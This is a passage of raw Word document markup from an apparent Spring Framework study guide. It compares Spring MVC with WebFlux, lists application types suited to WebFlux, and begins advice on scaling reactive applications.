          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="347D8861"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pps don’t require high concurrency or deal with slow remote services.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="3AAE7AB7" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61FCE0CE"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Wider Third-Party Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D4928C9"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Many libraries (e.g., security filters, logging tools) are </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>blocking</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> and built for servlet stack.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="4723EF45" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52A69433"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Team Familiarity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B903A93"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f your team is more experienced with the traditional model and blocking operations, MVC is </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>easier to maintain</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="0536D112" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="489F0A0D"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unning on Servlet Containers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1851625A"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Easier to use if you must deploy on </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Tomcat</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Jetty</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, or similar.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="22FF3FC3" w14:textId="77777777" w:rsidR="00585C01"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557683">
          <v:rect id="_x0000_i2348" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="353DD35D" w14:textId="77777777" w:rsidR="00585C01" w:rsidRPr="00B13F85" w:rsidRDefault="00585C01"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Hybrid Strategy (if needed):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE2611E"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f needed, you can have </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebFlux co-exist with MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the same app, but they’ll work on different controllers and configurations. However, this is rarely recommended due to complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB47691" w14:textId="77777777" w:rsidR="00585C01"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B03157">
          <v:rect id="_x0000_i2349" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08357B23" w14:textId="77777777" w:rsidR="00585C01" w:rsidRPr="00B13F85" w:rsidRDefault="00585C01"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Final Decision Rule of Thumb:</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71"/>
        <w:gridCol w:w="1504"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="4EC39F7F" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06C194C2" w14:textId="77777777" w:rsidR="00585C01" w:rsidRPr="00B13F85" w:rsidRDefault="00585C01"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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B747BF1" w14:textId="77777777" w:rsidR="00585C01" w:rsidRPr="00B13F85" w:rsidRDefault="00585C01"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Choice</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="5EFCC8E6" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41CAA7E6"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High-throughput, async systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1697F774"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pring WebFlux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="3A9E79CD" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22B3FC65"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Database-heavy, CRUD-based enterprise apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DE66430" w14:textId="77777777" w:rsidR="00585C01" w:rsidRPr="00B13F85" w:rsidRDefault="00585C0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pring MVC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D7C9658"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C6F610F">
          <v:rect id="_x0000_i2350" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA0A7F4" w14:textId="1BFB0FB9"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35" w:name="_Toc196308015"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What type of applications are best suited for Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="535"/>
    </w:p>
    <w:p w14:paraId="079182BC" w14:textId="1F6F8E8D" w:rsidR="003421E9" w:rsidRPr="00B13F85" w:rsidRDefault="003421E9"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Spring WebFlux is best suited for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous, non-blocking, event-driven applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high scalability and low resource usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are critical. Below are the types of applications where WebFlux really shines:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74512D67" w14:textId="77777777" w:rsidR="003421E9"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88F1675">
          <v:rect id="_x0000_i2351" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6947B0B7" w14:textId="77777777" w:rsidR="003421E9" w:rsidRPr="00B13F85" w:rsidRDefault="003421E9"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Best-Suited Application Types for Spring WebFlux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5356AF" w14:textId="77777777" w:rsidR="003421E9" w:rsidRPr="00B13F85" w:rsidRDefault="003421E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1. High-Concurrency APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E318197" w14:textId="77777777" w:rsidR="003421E9" w:rsidRPr="00B13F85" w:rsidRDefault="003421E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Microservices needing to handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thousands of concurrent requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C456E2D" w14:textId="77777777" w:rsidR="003421E9" w:rsidRPr="00B13F85" w:rsidRDefault="003421E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xample: Public APIs, payment gateways, API gateways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA07289" w14:textId="77777777" w:rsidR="003421E9" w:rsidRPr="00B13F85" w:rsidRDefault="003421E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2. Streaming &amp; Real-Time Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C56E8D4" w14:textId="77777777" w:rsidR="003421E9" w:rsidRPr="00B13F85" w:rsidRDefault="003421E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Apps that use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Server-Sent Events (SSE)</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WebSockets</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, or continuous data streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2EFEFB" w14:textId="77777777" w:rsidR="003421E9" w:rsidRPr="00B13F85" w:rsidRDefault="003421E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xample: Chat apps, live analytics dashboards, stock ticker feeds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF8C7A9" w14:textId="77777777" w:rsidR="003421E9" w:rsidRPr="00B13F85" w:rsidRDefault="003421E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3. I/O-Bound Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59108E7C" w14:textId="77777777" w:rsidR="003421E9" w:rsidRPr="00B13F85" w:rsidRDefault="003421E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pps making multiple remote API/database calls where waiting on responses would block threads in a traditional model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B37210E" w14:textId="77777777" w:rsidR="003421E9" w:rsidRPr="00B13F85" w:rsidRDefault="003421E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xample: Aggregators calling multiple third-party services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFC1983" w14:textId="77777777" w:rsidR="003421E9" w:rsidRPr="00B13F85" w:rsidRDefault="003421E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4. Reactive Microservices Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6B8125" w14:textId="77777777" w:rsidR="003421E9" w:rsidRPr="00B13F85" w:rsidRDefault="003421E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hen your services and databases (like MongoDB with Reactive Streams or R2DBC) are reactive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D463803" w14:textId="77777777" w:rsidR="003421E9" w:rsidRPr="00B13F85" w:rsidRDefault="003421E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xample: Event-driven microservices in a distributed system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DFC78C" w14:textId="77777777" w:rsidR="003421E9" w:rsidRPr="00B13F85" w:rsidRDefault="003421E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5. Cloud-Native &amp; Containerized Apps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F71475" w14:textId="77777777" w:rsidR="003421E9" w:rsidRPr="00B13F85" w:rsidRDefault="003421E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Apps that are deployed in environments like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes</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AWS Lambda</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Azure Functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, etc., where </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resource efficiency</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D8BB1A" w14:textId="77777777" w:rsidR="003421E9" w:rsidRPr="00B13F85" w:rsidRDefault="003421E9"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6. Low-Latency Event-Driven Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8E8BD2" w14:textId="77777777" w:rsidR="003421E9" w:rsidRPr="00B13F85" w:rsidRDefault="003421E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ystems that require near real-time processing of data with minimal latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3996B3AF" w14:textId="77777777" w:rsidR="003421E9" w:rsidRPr="00B13F85" w:rsidRDefault="003421E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xample: Fraud detection engines, streaming data pipelines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6578037C" w14:textId="77777777" w:rsidR="003421E9"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45D861C">
          <v:rect id="_x0000_i2352" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="482A8DC1" w14:textId="77777777" w:rsidR="003421E9" w:rsidRPr="00B13F85" w:rsidRDefault="003421E9"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Not Recommended for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238CF98F" w14:textId="77777777" w:rsidR="003421E9" w:rsidRPr="00B13F85" w:rsidRDefault="003421E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Traditional blocking databases</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like JPA/Hibernate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724EB19F" w14:textId="77777777" w:rsidR="003421E9" w:rsidRPr="00B13F85" w:rsidRDefault="003421E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Apps with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>low concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> needs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50011653" w14:textId="77777777" w:rsidR="003421E9" w:rsidRPr="00B13F85" w:rsidRDefault="003421E9"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Simple CRUD</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations where Spring MVC is simpler and more mature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF060FD"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7EB2CBD">
          <v:rect id="_x0000_i2353" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C5D282" w14:textId="4061A5B1"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36" w:name="_Toc196308016"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you ensure scalability in a reactive Spring WebFlux application</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="536"/>
    </w:p>
    <w:p w14:paraId="4C99C9F4" w14:textId="04D51B07" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B1"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o ensure </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive Spring WebFlux application</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, you focus on </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, efficient </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resource utilization</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive end-to-end integration</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here's how it's done:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E56E35" w14:textId="77777777" w:rsidR="004D21B1"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22C0A52">
          <v:rect id="_x0000_i2354" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C1B58D" w14:textId="77777777" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B1"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1. Use Non-Blocking I/O Across the Stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005EDB50" w14:textId="77777777" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for HTTP calls (instead of RestTemplate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52102D8E" w14:textId="77777777" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>R2DBC</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Reactive MongoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of blocking JDBC or JPA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B081D8" w14:textId="77777777" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B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void Thread.sleep(), synchronized, and blocking code inside reactive chains.</w:t>
      </w:r>
    </w:p>
